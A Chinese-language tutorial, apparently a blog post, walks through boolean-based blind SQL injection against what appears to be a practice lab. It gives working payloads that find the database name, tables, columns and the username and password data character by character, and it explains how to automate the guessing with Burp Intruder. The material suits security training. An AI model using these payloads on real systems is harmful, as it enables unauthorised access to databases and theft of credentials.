1,判断数据库名的长度
and length(database())>9
判断数据库等于8,为8个
2,获取数据库的ascii码值
and ascii(substr(database(),1,1))>97
*由于一个一个猜太麻烦了,可以使用burp工具的lntruedr模块进行爆破,
抓包之前需要将>号改成=号才能进行爆破。
1号选择cluster bomb意思是使用交叉爆破
2号表示需要查询的数据库字符的第一位
3号表示需要进行爆破的ascii码
*设置爆破参数
切换到payload界面
1号表示第几个字典
2号Numbers表示使用数字方式进行爆破
3号表示开始的字数,从几开始(数据库字段数的开始数)
4号表示到多少位数字结束(数据库字段数的结束的数)
5号表示号表示到多少位数字结束(数据库字段数的结束的数)
字典二这里爆破参数,设置参数和字典一样设置为Numbers
爆破,值,的都为ascii码,ascii从0到127结束
设置完这些后。Start开启爆破
已上黄色的内容为爆破出来的数据库名
使用解码工具进行解码
解码后数据库为security
3判断表的数量
and(select count(*) from information_schema.tables where table_schema=database())=4
判断表的数量为4
4判断表的字符长度
and (select length(table_name)from information_schema.tables where table_schema = database() limit 2,1)=7
表的字符长度为7
5判断表名的ascii值是多少
and ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 2,1),1,1))=120
这里不用一个一个进行判断,直接使用burp进行爆破就可以了
开启抓包1号为爆破的第一个字段,2号为爆破的ascii码,
payloads设置和上面设置的一样
不过字典1要根据,你查询出来的表名的实际,字符长度进行设置。1到n到1
字典2 为ascii码,还是和之前一样1到27到1
如果没有查询到自己想要的表就重新进行判断,查询重新第二表的字符长度,查询第二个表的asci码值,重复5到4的步骤
爆破出来 后使用解码根据进行解码
6.获取列的数量
and (select count(*) from information_schema.columns where table_name=‘users’ and table_schema = database() )=3
判断users表列的数量为3
7.获取列名的长度
and (select length(column_name) from information_schema.columns where table_name=‘users’ and table_schema = database() limit 1,1 )= 8
判断第二个列名长度为8
8.获取列名对应的ascii码值
and ascii(substr((select column_name from information_schema.columns where table_name =‘users’ and table_schema=database() limit 1,1 ),1,1 ))>97
这里不才阐述,怎么使用burp进行爆破了,步骤和爆表名的方式一样。
获取到的列名为username
使用以上方法继续获取第三个列明
第三个列名password
9.获取列的,第一个数据的长度
and (select length(username) from security.users limit 0,1)=4
获取长度为4
10,获取第username列,第一个数据对应的ascii值
ascii(substr((select username from security.users limit 0,1),1,1))=1
按上面使用爆表名的方式进行爆破.其他列也是使用这种方式只不过换一个形式而已
总结布尔盲注的步骤。
1,获取数据库名的长度。
2,获取数据库对应的ascii码值
3,获取表的数量
4,获取表名的长度
5,获取表名对应的ascii码值
6,获取列的数量
7,获取列的长度
8,获取某个列的数据的长度
9,获取数据对应的ascii值
228
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
